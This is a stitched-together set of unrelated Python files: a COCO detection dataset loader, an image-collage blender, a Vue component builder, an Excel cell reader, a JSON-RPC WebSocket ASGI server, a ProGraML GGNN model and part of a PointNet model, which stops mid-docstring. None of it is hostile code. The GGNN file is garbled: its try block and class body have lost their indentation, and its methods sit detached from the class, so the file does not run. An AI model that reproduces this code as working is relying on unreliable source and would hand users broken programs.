        categories = self.coco.loadCats(self.coco.getCatIds())
        categories.sort(key=lambda x: x["id"])
        self.label_map = {}
        self.label_info = {}
        counter = 1
        self.label_info[0] = "background"
        for c in categories:
            self.label_map[c["id"]] = counter
            self.label_info[counter] = c["name"]
            counter += 1
    def __getitem__(self, item):
        """Return ``(image, image_id, (height, width), boxes, labels)``.

        Boxes are converted from COCO pixel xywh to normalized
        [x1, y1, x2, y2]; samples without annotations yield five Nones
        (filtered out downstream by collate_fn).
        """
        image, target = super(CocoDataset, self).__getitem__(item)
        width, height = image.size
        boxes = []
        labels = []
        if len(target) == 0:
            return None, None, None, None, None
        for annotation in target:
            bbox = annotation.get("bbox")
            boxes.append([bbox[0] / width, bbox[1] / height, (bbox[0] + bbox[2]) / width, (bbox[1] + bbox[3]) / height])
            labels.append(self.label_map[annotation.get("category_id")])
        boxes = torch.tensor(boxes)
        labels = torch.tensor(labels)
        # transform is expected to accept and return the same 4-tuple shape
        # (image, (height, width), boxes, labels) — TODO confirm contract.
        if self.transform is not None:
            image, (height, width), boxes, labels = self.transform(image, (height, width), boxes, labels)
        return image, target[0]["image_id"], (height, width), boxes, labels
from copy import deepcopy
import numpy as np
class Collage():
    """Combines a positive-space image and a negative-space image through a mask.

    helpful post: https://stackoverflow.com/questions/46267443/merge-images-using-opencv-and-a-mask
    making masks: https://codereview.stackexchange.com/questions/184044/processing-an-image-to-extract-green-screen-mask
    creating alpha gradient image https://note.nkmk.me/en/python-numpy-generate-gradation-image/
    """
    def __init__(self, key):
        self.key = key
        self.negative_space = None
        self.positive_space = None

    def __str__(self):
        return self.key

    def set_negative_space(self, custom_image):
        self.negative_space = custom_image

    def set_positive_space(self, custom_image):
        self.positive_space = custom_image

    def set_mask(self, mask_container):
        self.mask = mask_container

    def combine(self):
        """Blend positive and negative space into ``self.composite``.

        Requires set_positive_space/set_negative_space/set_mask to have
        been called first.
        """
        if len(self.mask.mask.shape) != 2:
            # Multi-channel (alpha) mask: linear blend of the two images.
            mask = self.mask.prepare_mask_for_collage_combine()
            # NOTE(review): positive space is weighted by the prepared mask
            # but negative space by the raw self.mask.mask — confirm the
            # two are meant to differ.
            self.composite = (self.positive_space.image * mask + self.negative_space.image * (1 - self.mask.mask)).astype(np.uint8)
        else:
            # Boolean 2-D mask: start from the positive image and punch the
            # masked region through to the negative image.
            # BUG FIX: `copy` was never imported (only `deepcopy`), so this
            # branch raised NameError; use the imported deepcopy.  The old
            # re-assignment of positive pixels at ~mask was a no-op after
            # the copy and has been dropped.
            self.composite = deepcopy(self.positive_space.image)
            self.composite[self.mask.mask] = self.negative_space.image[self.mask.mask]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re,os,json
# #############################################################################
# Copyright (C) 2018 manatlan manatlan[at]gmail(dot)com
#
# MIT licence
#
# https://github.com/manatlan/vbuild
# #############################################################################
__version__="0.3" #py2.7 & py3.5 !!!!
def minimize(txt):
    """Minify javascript *txt* via the online Google closure-compiler service."""
    try: #py3
        import urllib.request as urlrequest
        import urllib.parse as urlparse
    except ImportError: #py2
        import urllib2 as urlrequest
        import urllib as urlparse
    payload = {
        'js_code': txt,
        'compilation_level': 'SIMPLE_OPTIMIZATIONS',
        'output_format': 'json',
        'output_info': 'compiled_code',
    }
    request = urlrequest.Request(
        "https://closure-compiler.appspot.com/compile",
        urlparse.urlencode(payload).encode("utf8"),
        {'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'})
    response = urlrequest.urlopen(request)
    raw = response.read()
    response.close()
    return json.loads(raw)["compiledCode"]
def mkPrefixCss(css, prefix=""):
    """Rewrite *css* so every selector is scoped under *prefix*.

    Comments and runs of whitespace are stripped first.  Each selector of
    every rule gets *prefix* prepended; the special selector ``:scope`` is
    replaced by *prefix* itself.

    >>> mkPrefixCss("div {color:red}", ".s")
    '.s div {color:red}'
    """
    lines = []
    # Raw strings for the regexes: the old plain strings relied on Python
    # passing unknown escapes like "\*" through unchanged.
    css = re.sub(re.compile(r"/\*.*?\*/", re.DOTALL), "", css)
    css = re.sub(re.compile(r"[ \t\n]+", re.DOTALL), " ", css)
    for rule in re.findall(r'[^}]+{[^}]+}', css):
        sels, decs = rule.split("{", 1)
        scoped = [prefix + (" " + s.strip() if s.strip() != ":scope" else "")
                  for s in sels.split(",")]
        lines.append(", ".join(scoped) + " {" + decs)
    return "\n".join(lines).strip("\n ")
class VBuild:
    """Parses a single-file Vue component (.vue) into its html template,
    component-registration script and scoped css parts."""
    def __init__(self,filename,content=None): # old vueToTplScript (only one style default scoped !)
        # Read the file only when raw content isn't supplied.
        if content is None:
            with open(filename,"r+") as fid:
                content=fid.read()
        name=os.path.basename(filename)[:-4]
        # Unique id derived from the path; used to scope the template & css.
        unique = filename[:-4].replace("/","-").replace("\\","-").replace(":","-")
        # unique = name+"-"+''.join(random.choice(string.letters + string.digits) for _ in range(8))
        tplId="tpl-"+unique
        dataId="data-"+unique
        # NOTE(review): the trailing inline "(?s)" flag is rejected at that
        # position by modern Python re — confirm the targeted runtime.
        vt= re.search(r'<(template).*?>(.*)</\1>(?s)', content)
        vs= re.search(r'<(script).*?>[^\{]*(\{.*\})[^\}]*</\1>(?s)', content) # better regex compatible real vue et marco ;-)
        vc= re.search(r'<(style).*?>(.*)</\1>(?s)', content)
        html=vt.group(2)
        js=vs and vs.group(2) or "{}"
        css=vc and vc.group(2)
        # Tag the component's root element with dataId so the prefixed css
        # below only applies inside this component.
        g=re.search(r'<([\w-]+).*?>',html)
        tag=g.group(1)
        dec = g.group(0)
        newdec=dec.replace("<%s"%tag,"<%s %s"%(tag,dataId))
        html=html.replace(dec,newdec,1)
        self.html="""<script type="text/x-template" id="%s">%s</script>""" % (tplId,html)
        self.script="""var %s = Vue.component('%s', %s);""" % (name,name,js.replace("{","{template:'#%s'," % tplId,1))
        self.style=mkPrefixCss(css,"%s[%s]" % (tag,dataId)) if css else ""
        self.tags=[name]
    def __add__(self,o):
        # Concatenate two components' parts (mutates and returns self).
        join=lambda *l: ("\n".join(l)).strip("\n")
        self.html=join(self.html,o.html)
        self.script=join(self.script,o.script)
        self.style=join(self.style,o.style)
        self.tags.extend(o.tags)
        return self
    def __radd__(self, o):
        # Support sum([...]), which starts its accumulation from 0.
        return self if o == 0 else self.__add__(o)
    def __getstate__(self):
        return self.__dict__
    def __setstate__(self, d):
        self.__dict__ = d
    def __repr__(self):
        return """
<style>
%s
</style>
%s
<script>
%s
</script>
""" % (self.style,self.html,self.script)
    def toTestFile(self,filename):
        """Write a standalone html page that loads Vue and mounts the component(s)."""
        with open(filename,"w+") as fid:
            fid.write("""
<script src="https://unpkg.com/vue@2.5.16/dist/vue.js"></script>
%s
<div id="app"> x %s x </div>
<script>new Vue({el:"#app"});</script>
""" % (self,"".join(["<%s/>"%t for t in self.tags])))
if __name__=="__main__":
    from glob import glob
    # Ad-hoc manual test drivers, kept commented out by the author.
    #~ o=sum( [VBuild(i) for i in glob("comps/**/*.vue")] )
    #~ o=VBuild("comps/c1.vue")
    #~ o=VBuild(r"D:\PROG\wreqman\web\req.vue")
    #~ o.toTestFile("aeff.html")
    #~ print(o)
    pass
|
import openpyxl

# Workbooks to harvest; each contributes the value of cell B5 on "Sheet1".
files = [r'C:\Users\roman\Documents\Testes excel_python/january.xlsx']
values = []
for workbook_path in files:
    worksheet = openpyxl.load_workbook(workbook_path)['Sheet1']
    values.append(worksheet['B5'].value)
print(values)
import json
import logging
from marshmallow import Schema, ValidationError
from .request import Request
from .client import Client
from .jsonrpc import jrpc_accept, jrpc_response, validate_jrpc_request
from .errors import (
CorvusException, NotFound, UnknownAsgiAction, ParseError, InvalidRequest,
Unauthorized
)
class App:
    """Minimal JSON-RPC-over-WebSocket ASGI application.

    Handler coroutines are registered by method name and dispatched once
    per incoming websocket frame; optional lifecycle hooks let user code
    observe startup/shutdown and connection events.
    """
    def __init__(
        self, title = 'Another Corvus App',
        version = '0.0.1', *args, **kwargs
    ):
        self.title = title
        self.version = version
        self.methods = {}   # RPC method name -> handler coroutine
        self.clients = {}   # ws_id -> Client for live connections
        self.users = {}     # user id -> Client for authenticated clients
        # Each hook slot holds a single optional synchronous callable.
        self.hooks = {
            'before_startup': None,
            'after_startup': None,
            'before_shutdown': None,
            'after_shutdown': None,
            'before_connection': None,
            'after_connection': None,
            'on_disconnection': None,
            'on_request': None,
            'on_response': None
        }
        self.args = args
        self.kwargs = kwargs
        logging.info(f'{self.title} [{self.version}] inited')
    def _run_hook(self, hook_name, *args):
        # Invoke the hook when one is registered; silently no-op otherwise.
        if not self.hooks[hook_name]:
            return
        self.hooks[hook_name](*args)
    def add_hook(self, hook_name, hook_func):
        """Register *hook_func* under a known hook name (unknown names are logged and ignored)."""
        if hook_name not in self.hooks.keys():
            logging.error(f'Unknown hook {hook_name}')
            return
        self.hooks[hook_name] = hook_func
    def _init_client(self, base_request, send):
        # Create and index a Client for a freshly accepted websocket.
        client = Client(base_request, send)
        self.clients[base_request.ws_id] = client
        return client
    def _remove_client(self, client):
        self.clients.pop(client.ws_id)
    def _make_request(self, base_request, message):
        """Parse and validate an incoming websocket text frame into a Request.

        Raises:
            ParseError: the frame is not valid JSON.
            InvalidRequest: the payload is not a valid JSON-RPC request.
            NotFound: the requested method is not registered.
        """
        try:
            parsed = json.loads(message['text'])
        except json.JSONDecodeError:
            raise ParseError
        if not validate_jrpc_request(parsed):
            raise InvalidRequest
        if parsed['method'] not in self.methods.keys():
            raise NotFound
        return base_request._make_request(parsed)
    async def _make_response(self, request, client):
        # Dispatch to the registered handler coroutine.
        return await self.methods[request.method](request, client)
    def add_method(self, name, method):
        """Register handler coroutine *method* under *name*."""
        self.methods[name] = method
    def method(self, name):
        """Decorator form of add_method."""
        def wrapped(method):
            self.methods[name] = method
            return method
        return wrapped
    def add_user(self, client, user):
        """Attach *user* to *client* and index the client by user id."""
        client.user = user
        self.users[user.id] = client
    def remove_user(self, client):
        self.users.pop(client.user.id)
    def before(self, func):
        """Decorator factory: run *func* on (request, client) before the handler."""
        def decorator(method):
            async def wrapped(req, client):
                req, client = func(req, client)
                return await method(req, client)
            return wrapped
        return decorator
    def after(self, func):
        """Decorator factory: run *func* on (request, response, client) after the handler."""
        def decorator(method):
            async def wrapped(req, client):
                resp = await method(req, client)
                return func(req, resp, client)
            return wrapped
        return decorator
    async def __call__(self, scope, receive, send):
        """ASGI entry point; handles 'lifespan' and 'websocket' scopes."""
        if scope['type'] == 'lifespan':
            message = await receive()
            if message['type'] == 'lifespan.startup':
                self._run_hook('before_startup', scope, receive, send)
                await send({'type': 'lifespan.startup.complete'})
                self._run_hook('after_startup', scope, receive, send)
                return
            elif message['type'] == 'lifespan.shutdown':
                self._run_hook('before_shutdown', scope, receive, send)
                await send({'type': 'lifespan.shutdown.complete'})
                self._run_hook('after_shutdown', scope, receive, send)
                return
        elif scope['type'] == 'websocket':
            pass
        else:
            logging.error(f"Unsupported scope type - {scope['type']}")
            return
        # Websocket handshake: the first frame must be a connect.
        message = await receive()
        if message['type'] == 'websocket.connect':
            self._run_hook('before_connection', scope, receive, send, message)
        else:
            return
        await send(jrpc_accept())
        self._run_hook('after_connection', scope, receive, send)
        base_request = Request(scope, receive, send)
        client = self._init_client(base_request, send)
        # Main receive loop: one JSON-RPC request per websocket frame.
        while True:
            message = await receive()
            if message['type'] in ('websocket.disconnect', 'websocket.close'):
                self._run_hook('on_disconnection', message, client)
                break
            elif message['type'] == 'websocket.receive':
                try:
                    request = self._make_request(base_request, message)
                except CorvusException as e:
                    await send(e.error())
                    continue
                self._run_hook('on_request', request, client)
                try:
                    response = await self._make_response(request, client)
                except CorvusException as e:
                    await send(e.error())
                    continue
                self._run_hook('on_response', response, client)
                if response:
                    await send(jrpc_response(response, request.id))
            else:
                # NOTE(review): error() is invoked on the UnknownAsgiAction
                # class, not an instance — confirm it is a class/static method.
                await send(UnknownAsgiAction.error())
        self._remove_client(client)
|
# Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <chrisc.101@gmail.com>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A gated graph neural network classifier."""
import typing
from typing import Dict
import numpy as np
import torch
from absl import flags, logging
from torch import nn
from ncc.models.dataflow.batch_data import BatchData
from ncc.models.dataflow.batch_results import BatchResults
from ncc.models.dataflow.ggnn.aux_readout import AuxiliaryReadout
from ncc.models.dataflow.ggnn.ggnn_batch import GgnnBatchData
from ncc.models.dataflow.ggnn.ggnn_model import GGNNModel
from ncc.models.dataflow.ggnn.ggnn_proper import GGNNProper
from ncc.models.dataflow.ggnn.loss import Loss
from ncc.models.dataflow.ggnn.node_embeddings import NodeEmbeddings
from ncc.models.dataflow.ggnn.readout import Readout
from ncc.models.dataflow.model import Model
from ncc import LOGGER
try:
from third_party.programl.programl.graph.format.py.graph_tuple import GraphTuple
from third_party.programl.programl.proto import epoch_pb2
from third_party.programl.programl.util.py.progress import NullContext, ProgressContext
except ImportError as err:
LOGGER.warning(err)
from third_party.download import download
download('programl')
FLAGS = flags.FLAGS
# Graph unrolling flags.
flags.DEFINE_string(
    "unroll_strategy",
    "constant",
    "The unroll strategy to use. One of: "
    "{none, constant, edge_count, data_flow_max_steps, label_convergence} "
    "constant: Unroll by a constant number of steps.",
)
flags.DEFINE_float(
    "unroll_convergence_threshold",
    0.995,
    "convergence interval: fraction of labels that need to be stable",
)
flags.DEFINE_integer(
    "unroll_convergence_steps",
    1,
    "required number of consecutive steps within the convergence interval",
)
flags.DEFINE_integer(
    "unroll_max_steps",
    1000,
    "The maximum number of iterations to attempt to reach label convergence. "
    "No effect when --unroll_strategy is not label_convergence.",
)
flags.DEFINE_list(
    "layer_timesteps",
    ["30"],
    "A list of layers, and the number of steps for each layer.",
)
# Optimizer / learning-rate flags.
flags.DEFINE_float("learning_rate", 0.00025, "The initial learning rate.")
flags.DEFINE_float(
    "lr_decay_rate",
    0.95,
    "Learning rate decay; multiplicative factor for lr after every epoch.",
)
flags.DEFINE_integer(
    "lr_decay_steps",
    1000,
    "Steps until next LR decay.",
)
flags.DEFINE_float("clip_gradient_norm", 0.0, "Clip gradients to L-2 norm.")
# Edge and message flags.
flags.DEFINE_boolean("use_backward_edges", True, "Add backward edges.")
flags.DEFINE_boolean("use_edge_bias", True, "")
flags.DEFINE_boolean(
    "msg_mean_aggregation",
    True,
    "If true, normalize incoming messages by the number of incoming messages.",
)
# Embeddings options.
flags.DEFINE_string(
    "text_embedding_type",
    "random",
    "The type of node embeddings to use. One of "
    "{constant_zero, constant_random, random}.",
)
flags.DEFINE_integer(
    "text_embedding_dimensionality",
    32,
    "The dimensionality of node text embeddings.",
)
flags.DEFINE_boolean(
    "use_position_embeddings",
    True,
    "Whether to use position embeddings as signals for edge order. "
    "False may be a good default for small datasets.",
)
flags.DEFINE_float(
    "selector_embedding_value",
    50,
    "The value used for the positive class in the 1-hot selector embedding "
    "vectors. Has no effect when selector embeddings are not used.",
)
# Loss.
flags.DEFINE_float(
    "intermediate_loss_weight",
    0.2,
    "The true loss is computed as loss + factor * intermediate_loss. Only "
    "applicable when graph_x_dimensionality > 0.",
)
# Graph features flags.
flags.DEFINE_integer(
    "graph_x_layer_size",
    32,
    "Size for MLP that combines graph_features and aux_in features",
)
flags.DEFINE_boolean(
    "log1p_graph_x",
    True,
    "If set, apply a log(x + 1) transformation to incoming auxiliary graph-level features.",
)
# Dropout flags.
flags.DEFINE_float(
    "graph_state_dropout",
    0.2,
    "Graph state dropout rate.",
)
flags.DEFINE_float(
    "edge_weight_dropout",
    0.0,
    "Edge weight dropout rate.",
)
flags.DEFINE_float(
    "output_layer_dropout",
    0.0,
    "Dropout rate on the output layer.",
)
# Loss flags
flags.DEFINE_float(
    "loss_weighting",
    0.5,
    # Help-text fix: the adjacent string literals previously concatenated
    # without separating spaces, and "trum" was a typo for "true".
    "Weight loss contribution in batch by inverse class prevalence "
    "to mitigate class imbalance in the dataset. "
    "Currently implemented as a float w --> [1 - w, w] weighting for 2 class problems. "
    "This flag will crash the program if set to true and num_classes != 2.",
)
# Not implemented yet:
# flags.DEFINE_boolean("loss_masking",
#                      False,
#                      "Mask loss computation on nodes chosen at random from each class "
#                      "such that balanced class distributions (per batch) remain")
# Debug flags.
flags.DEFINE_boolean(
    "debug_nan_hooks",
    False,
    "If set, add hooks to model execution to trap on NaNs.",
)
def NanHook(self, _, output):
    """Checks return values of any forward() function for NaN"""
    outputs = output if isinstance(output, tuple) else [output]
    for idx, out_tensor in enumerate(outputs):
        nan_positions = torch.isnan(out_tensor)
        if not nan_positions.any():
            continue
        print("In", self.__class__.__name__)
        raise RuntimeError(
            f"Found NAN in output {idx} at indices: ",
            nan_positions.nonzero(),
            "where:",
            out_tensor[nan_positions.nonzero()[:, 0].unique(sorted=True)],
        )
class Ggnn(Model):
"""A gated graph neural network."""
def __init__(
self,
vocabulary: Dict[str, int],
node_y_dimensionality: int,
graph_y_dimensionality: int,
graph_x_dimensionality: int,
use_selector_embeddings: bool,
test_only: bool = False,
name: str = "ggnn",
):
"""Constructor."""
super(Ggnn, self).__init__(
name=name, vocabulary=vocabulary, test_only=test_only
)
# Graph attribute shapes.
self.node_y_dimensionality = node_y_dimensionality
self.graph_x_dimensionality = graph_x_dimensionality
self.graph_y_dimensionality = graph_y_dimensionality
self.node_selector_dimensionality = 2 if use_selector_embeddings else 0
if graph_y_dimensionality and node_y_dimensionality:
raise ValueError(
"Cannot use both node and graph-level classification at"
"the same time."
)
node_embeddings = NodeEmbeddings(
node_embeddings_type=FLAGS.text_embedding_type,
use_selector_embeddings=self.node_selector_dimensionality > 0,
selector_embedding_value=FLAGS.selector_embedding_value,
embedding_shape=(
# Add one to the vocabulary size to account for the out-of-vocab token.
len(vocabulary) + 1,
FLAGS.text_embedding_dimensionality,
),
)
self.clip_gradient_norm = FLAGS.clip_gradient_norm
if self.has_aux_input:
aux_readout = AuxiliaryReadout(
num_classes=self.num_classes,
log1p_graph_x=FLAGS.log1p_graph_x,
output_dropout=FLAGS.output_layer_dropout,
graph_x_layer_size=FLAGS.graph_x_layer_size,
graph_x_dimensionality=self.graph_x_dimensionality,
)
else:
aux_readout = None
self.model = GGNNModel(
node_embeddings=node_embeddings,
ggnn=GGNNProper(
readout=Readout(
num_classes=self.num_classes,
has_graph_labels=self.has_graph_labels,
hidden_size=node_embeddings.embedding_dimensionality,
output_dropout=FLAGS.output_layer_dropout,
),
text_embedding_dimensionality=node_embeddings.text_embedding_dimensionality,
selector_embedding_dimensionality=node_embeddings.selector_embedding_dimensionality,
forward_edge_type_count=3,
unroll_strategy=FLAGS.unroll_strategy,
use_backward_edges=FLAGS.use_backward_edges,
layer_timesteps=self.layer_timesteps,
use_position_embeddings=FLAGS.use_position_embeddings,
use_edge_bias=FLAGS.use_edge_bias,
msg_mean_aggregation=FLAGS.msg_mean_aggregation,
max_timesteps=FLAGS.unroll_max_steps,
unroll_convergence_threshold=FLAGS.unroll_convergence_threshold,
unroll_convergence_steps=FLAGS.unroll_convergence_steps,
graph_state_dropout=FLAGS.graph_state_dropout,
edge_weight_dropout=FLAGS.edge_weight_dropout,
),
aux_readout=aux_readout,
loss=Loss(
num_classes=self.num_classes,
has_aux_input=self.has_aux_input,
intermediate_loss_weight=FLAGS.intermediate_loss_weight,
class_prevalence_weighting=FLAGS.loss_weighting,
),
has_graph_labels=self.has_graph_labels,
test_only=self.test_only,
learning_rate=FLAGS.learning_rate,
lr_decay_rate=FLAGS.lr_decay_rate,
)
if FLAGS.debug_nan_hooks:
for submodule in self.model.modules():
submodule.register_forward_hook(NanHook)
@property
def opt_step_count(self) -> int:
step = self.model.opt.state[self.model.opt.param_groups[0]["params"][0]]["step"]
return step
@property
def num_classes(self) -> int:
return self.node_y_dimensionality or self.graph_y_dimensionality
@property
def has_graph_labels(self) -> bool:
return self.graph_y_dimensionality > 0
@property
def has_aux_input(self) -> bool:
return self.graph_x_dimensionality > 0
@property
def message_passing_step_count(self) -> int:
return self.layer_timesteps.sum()
@property
def layer_timesteps(self) -> np.array:
return np.array([int(x) for x in FLAGS.layer_timesteps])
@property
def trainable_parameter_count(self) -> int:
"""Compute the trainable parameter count in this module and its children."""
return self.model.trainable_parameter_count
def PrepareModelInputs(
    self, epoch_type: epoch_pb2.EpochType, batch: BatchData
) -> Dict[str, torch.Tensor]:
    """RunBatch() helper method to prepare inputs to model.

    Args:
      epoch_type: The type of epoch the model is performing.
      batch: A batch of data to prepare inputs from:

    Returns:
      A dictionary of model inputs.
    """
    del epoch_type  # unused: inputs are prepared the same way for all epochs
    batch_data: GgnnBatchData = batch.model_data
    graph_tuple: GraphTuple = batch_data.graph_tuple
    # Batch to model-inputs. torch.from_numpy() shares memory with numpy.
    # TODO(github.com/ChrisCummins/ProGraML/issues/27): maybe we can save
    # memory copies in the training loop if we can turn the data into the
    # required types (np.int64 and np.float32) once they come off the network
    # from the database, where smaller i/o size (int32) is more important.
    vocab_ids = torch.from_numpy(batch_data.vocab_ids).to(
        self.model.dev, torch.long
    )
    selector_ids = torch.from_numpy(batch_data.selector_ids).to(
        self.model.dev, torch.long
    )
    # TODO(github.com/ChrisCummins/ProGraML/issues/27): Consider performing
    # 1-hot expansion of node labels on device to save on data transfer.
    labels = torch.from_numpy(batch_data.node_labels).to(self.model.dev, torch.long)
    # One tensor per adjacency list / edge-position list in the graph tuple.
    edge_lists = [
        torch.from_numpy(x).to(self.model.dev, torch.long)
        for x in graph_tuple.adjacencies
    ]
    edge_positions = [
        torch.from_numpy(x).to(self.model.dev, torch.long)
        for x in graph_tuple.edge_positions
    ]
    model_inputs = {
        "vocab_ids": vocab_ids,
        "selector_ids": selector_ids,
        "labels": labels,
        "edge_lists": edge_lists,
        "pos_lists": edge_positions,
    }
    # maybe fetch more inputs.
    # TODO:
    # if graph_tuple.has_graph_y:
    # assert (
    # epoch_type != epoch_pb2.TRAIN
    # or graph_tuple.graph_tuple_count > 1
    # ), f"graph_count is {graph_tuple.graph_tuple_count}"
    # num_graphs = torch.tensor(graph_tuple.graph_tuple_count).to(
    # self.model.dev, torch.long
    # )
    # graph_nodes_list = torch.from_numpy(
    # graph_tuple.disjoint_nodes_list
    # ).to(self.model.dev, torch.long)
    #
    # aux_in = torch.from_numpy(graph_tuple.graph_x).to(
    # self.model.dev, torch.get_default_dtype()
    # )
    # model_inputs.update(
    # {
    # "num_graphs": num_graphs,
    # "graph_nodes_list": graph_nodes_list,
    # "aux_in": aux_in,
    # }
    # )
    return model_inputs
def RunBatch(
    self,
    epoch_type: epoch_pb2.EpochType,
    batch: BatchData,
    ctx: ProgressContext = NullContext,
) -> BatchResults:
    """Process a mini-batch of data through the GGNN.

    Args:
      epoch_type: The type of epoch being run.
      batch: The batch data returned by MakeBatch().
      ctx: A logging context.

    Returns:
      A batch results instance.
    """
    model_inputs = self.PrepareModelInputs(epoch_type, batch)
    unroll_steps = np.array(
        GetUnrollSteps(epoch_type, batch, FLAGS.unroll_strategy),
        dtype=np.int64,
    )

    # Set the model into the correct mode and feed through the batch data.
    if epoch_type == epoch_pb2.TRAIN:
        if not self.model.training:
            self.model.train()
        outputs = self.model(**model_inputs)
    else:
        if self.model.training:
            self.model.eval()
            self.model.opt.zero_grad()
        # Inference only, don't trace the computation graph.
        with torch.no_grad():
            outputs = self.model(**model_inputs)

    (
        targets,
        logits,
        graph_features,
        *unroll_stats,
    ) = outputs

    loss = self.model.loss((logits, graph_features), targets)

    if epoch_type == epoch_pb2.TRAIN:
        loss.backward()
        # BUG FIX: the PyTorch API is nn.utils.clip_grad_norm_, not
        # clip_gradient_norm_; the old name raised AttributeError whenever
        # gradient clipping was enabled.
        # TODO(github.com/ChrisCummins/ProGraML/issues/27): NB, pytorch clips by
        # norm of the gradient of the model, while tf clips by norm of the grad
        # of each tensor separately. Therefore we change default from 1.0 to 6.0.
        # TODO(github.com/ChrisCummins/ProGraML/issues/27): Anyway: Gradients
        # shouldn't really be clipped if not necessary?
        if self.clip_gradient_norm > 0.0:
            nn.utils.clip_grad_norm_(
                self.model.parameters(), self.clip_gradient_norm
            )
        self.model.opt.step()
        self.model.opt.zero_grad()

        # check for LR scheduler stepping
        if self.opt_step_count % FLAGS.lr_decay_steps == 0:
            # If scheduler exists, then step it after every epoch
            if self.model.scheduler is not None:
                old_learning_rate = self.model.learning_rate
                self.model.scheduler.step()
                logging.info(
                    "LR Scheduler step. New learning rate is %s (was %s)",
                    self.model.learning_rate,
                    old_learning_rate,
                )

    # unroll_stats is only populated by unrolling strategies that report
    # (iteration_count, converged); otherwise fall back to the fixed step count.
    model_converged = unroll_stats[1] if unroll_stats else False
    iteration_count = unroll_stats[0] if unroll_stats else unroll_steps
    return BatchResults.Create(
        targets=batch.model_data.node_labels,
        predictions=logits.detach().cpu().numpy(),
        model_converged=model_converged,
        learning_rate=self.model.learning_rate,
        iteration_count=iteration_count,
        loss=loss.item(),
    )
def GetModelData(self) -> typing.Any:
    """Return a picklable snapshot of model, optimizer and scheduler state.

    NOTE(review): self.model.scheduler may be unset/None for a test-only model
    (LoadModelData only restores it when not test_only) -- confirm this is
    never called in that configuration, else .state_dict() will fail.
    """
    return {
        "model_state_dict": self.model.state_dict(),
        "optimizer_state_dict": self.model.opt.state_dict(),
        "scheduler_state_dict": self.model.scheduler.state_dict(),
    }
def LoadModelData(self, data_to_load: typing.Any) -> None:
    """Restore model weights and, unless test-only, optimizer/scheduler state."""
    self.model.load_state_dict(data_to_load["model_state_dict"])
    # only restore opt if needed. opt should be None o/w.
    if not self.test_only:
        self.model.opt.load_state_dict(data_to_load["optimizer_state_dict"])
        self.model.scheduler.load_state_dict(data_to_load["scheduler_state_dict"])
def GetUnrollSteps(
    epoch_type: epoch_pb2.EpochType, batch: BatchData, unroll_strategy: str
) -> int:
    """Determine the unroll factor using the --unroll_strategy flag."""
    # Training always unrolls by the fixed layer_timesteps schedule.
    if epoch_type == epoch_pb2.TRAIN:
        return 1
    if unroll_strategy == "constant":
        # Unroll by a constant number of steps according to layer_timesteps.
        return 1
    if unroll_strategy == "data_flow_max_steps":
        # TODO: Gather data_flow_steps during batch construction.
        max_steps = max(g.data_flow_steps for g in batch.model_data.graphs)
        logging.debug("Determined max data flow steps to be %d", max_steps)
        return max_steps
    if unroll_strategy == "edge_count":
        max_edges = max(g.edge_count for g in batch.model_data.graphs)
        logging.debug("Determined max edge count to be %d", max_edges)
        return max_edges
    if unroll_strategy == "label_convergence":
        # 0 is the sentinel for label-convergence mode; interpretation is up
        # to the caller.
        return 0
    raise ValueError(f"Unknown unroll strategy '{unroll_strategy}'")
|
'''
Author : ZHP
Date : 2021-12-07 16:29:47
LastEditors : ZHP
LastEditTime : 2022-01-14 20:11:55
FilePath : /models/pointnet/PointNetModel.py
Description :
Copyright 2021 ZHP, All Rights Reserved.
2021-12-07 16:29:47
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from .pointNetUtils import PointNetEncoder, TNetkd, feature_transform_reguliarzer
from torchsummary import summary
class PointNetCls(nn.Module):
    """PointNet classification head: global-feature encoder followed by three FC layers."""

    def __init__(self, classes=40, normal_channel=True):
        super().__init__()
        in_channel = 6 if normal_channel else 3  # 3 = xyz coordinates only; 6 = xyz plus normal features
        self.encoder = PointNetEncoder(global_feature=True, feature_transform=True, in_channel=in_channel)
        self.fc1 = nn.Sequential(
            nn.Linear(1024, 512),
            nn.BatchNorm1d(512),
            nn.ReLU()
        )
        self.fc2 = nn.Sequential(
            nn.Linear(512, 256),
            nn.Dropout(p=0.4),
            nn.BatchNorm1d(256),
            nn.ReLU()
        )
        self.fc3 = nn.Linear(256, classes)

    def forward(self, x):
        """Classify point cloud x -> (log-probabilities [B, classes], second transform matrix)."""
        x, trans_matrix, trans_matrix_2 = self.encoder(x)  # x [B, 1024]
        x = self.fc2(self.fc1(x))  # [B, 256]
        x = self.fc3(x)  # [B, classes]
        # Because log_softmax is applied here, the training loss must be NLLLoss.
        x = F.log_softmax(x, dim=-1)  # [B, classes]
        return x, trans_matrix_2
class PointNetPartSeg(nn.Module):
    """PointNet part-segmentation network (detailed structure from the paper's supplementary material)."""

    def __init__(self, part_count=50, normal_channel=True):
        super().__init__()
        in_channel = 6 if normal_channel else 3  # 3 = xyz coordinates only; 6 = xyz plus normal features
        self.part_count = part_count
        self.tnet1 = TNetkd(in_channel, 3)
        self.conv1 = TNetkd.get_single_conv(in_channel, 64, 1)
        self.conv2 = TNetkd.get_single_conv(64, 128, 1)
        self.conv3 = TNetkd.get_single_conv(128, 128, 1)
        self.conv4 = TNetkd.get_single_conv(128, 512, 1)
        self.conv5 = TNetkd.get_single_conv(512, 2048, 1, activate=False)
        self.tnet2 = TNetkd(in_channel=128, output_k=128)
        # 3024 = 64 + 128 + 128 + 128 + 512 (local features) + 2048 (global) + 16 (one-hot label)
        self.classifier = nn.Sequential(
            TNetkd.get_single_conv(3024, 256, 1),
            TNetkd.get_single_conv(256, 256, 1),
            TNetkd.get_single_conv(256, 128, 1),
            nn.Conv1d(128, part_count, 1)
        )
        self.max_pool = torch.max

    def forward(self, x, label):
        '''
        PointNet part-segmentation forward pass; concatenates several local
        features (structure given in the paper's supplementary material).

        param {torch.tensor} x : input point cloud [B, C, N]
        param {torch.tensor} label : one-hot encoding, [B, 16]; ShapeNet-Part has
            16 object categories and 50 parts -- this is the cloud's object
            (category) label
        return {torch.tensor} output: per-point part-class probabilities
            (after LogSoftmax), [B, N, 50]
